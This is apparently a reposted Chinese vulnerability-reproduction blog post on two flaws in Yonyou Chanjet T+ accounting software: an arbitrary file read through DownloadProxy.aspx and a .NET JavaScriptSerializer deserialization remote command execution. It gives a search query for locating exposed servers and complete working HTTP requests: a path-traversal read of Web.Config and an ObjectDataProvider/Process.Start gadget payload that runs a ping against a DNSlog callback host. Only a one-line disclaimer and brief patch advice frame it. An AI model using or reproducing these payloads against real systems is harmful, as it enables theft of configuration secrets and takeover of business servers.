用友畅捷通TPlus DownloadProxy.aspx任意文件读取漏洞+远程命令执行漏洞

文章目录

    • 前言
  • 一.用友畅捷通TPlus DownloadProxy.aspx任意文件读取漏
    • 0x01 漏洞描述
    • 0x02 影响版本
    • 0x03 漏洞环境
    • 0x04 漏洞复现
      • 1.构造POC
    • 0x05 修复建议
  • 二.用友畅捷通TPlus远程命令执行漏洞
    • 0x01 漏洞描述
    • 0x02 影响版本
    • 0x03 漏洞环境
    • 0x04 漏洞复现
      • 1.构造POC
      • 2.看DNSlog回显
    • 0x05 修复建议

前言

本次测试仅供学习使用,如若非法他用,与本文作者无关,需自行负责!!!

一.用友畅捷通TPlus DownloadProxy.aspx任意文件读取漏

0x01 漏洞描述

畅捷通T+专属云适用于需要一体化管理的企业,财务管理、业务管理、零售管理、生产管理、物流管理、移动仓管、营销管理、委外加工等人财货客一体化管理。该系统在DownloadProxy.aspx存在任意文件读取漏洞。

0x02 影响版本

畅捷通T+

0x03 漏洞环境

app=“畅捷通-TPlus”
用友畅捷通TPlus DownloadProxy.aspx任意文件读取漏洞+远程命令执行漏洞_第1张图片用友畅捷通TPlus DownloadProxy.aspx任意文件读取漏洞+远程命令执行漏洞_第2张图片

0x04 漏洞复现

1.构造POC

GET /tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config HTTP/1.1
Host: ip:port
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

用友畅捷通TPlus DownloadProxy.aspx任意文件读取漏洞+远程命令执行漏洞_第3张图片发现可以读取web.config文件。

0x05 修复建议

请关注厂商主页及时更新: https://www.chanjet.com/

二.用友畅捷通TPlus远程命令执行漏洞

0x01 漏洞描述

畅捷通T+专属云适用于需要一体化管理的企业,财务管理、业务管理、零售管理、生产管理、物流管理、移动仓管、营销管理、委外加工等人财货客一体化管理。该漏洞属于.net反序列化场景中的 JavaScriptSerializer反序列化。在.NET处理 Ajax应用的时候,通常序列化功能由JavaSerializer类提供,它是.NET2.0之后内部实现的序列化功能的类,位于命名空间System.Web…Serialization、通过System.Web.Extensions引用,让开发者轻松实现.Net中所有类型和Json数据之间的转换,但在某些场景下开发者使用Deserialize 或DeserializeObject方法处理不安全的Json数据时会造成反序列化攻击从而实现远程RCE漏洞。

简而言之用友畅捷通Tplus存在前台远程代码执行漏洞,攻击者可利用GetStoreWarehouseByStore 方法注入序列化的payload,执行任意命令。最终造成服务器敏感性信息泄露或代码执行。

0x02 影响版本

畅捷通Tplus 13.0 
畅捷通Tplus 16.0

0x03 漏洞环境

app=“畅捷通-TPlus”
用友畅捷通TPlus DownloadProxy.aspx任意文件读取漏洞+远程命令执行漏洞_第4张图片

0x04 漏洞复现

1.构造POC

POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Content-Length: 679
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

{
          "storeID":{
            "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
            "MethodName":"Start",
            "ObjectInstance":{
              "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
              "StartInfo":{
                "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
                "FileName":"cmd",
                "Arguments":"/c ping xxxxxx.dgrh3.cn"
              }
            }
          }
        }

用友畅捷通TPlus DownloadProxy.aspx任意文件读取漏洞+远程命令执行漏洞_第5张图片
出现actorId或archivesId不能为空,则存在该漏洞。

2.看DNSlog回显

用友畅捷通TPlus DownloadProxy.aspx任意文件读取漏洞+远程命令执行漏洞_第6张图片有回显说明ping命令成功执行!!!

0x05 修复建议

当前官方已发布安全补丁,建议受影响的用户及时联系产商安装安全补丁。链接如下:
https://www.chanjetvip.com/product/goods/

你可能感兴趣的:(漏洞复现,安全,系统安全,web安全,网络安全)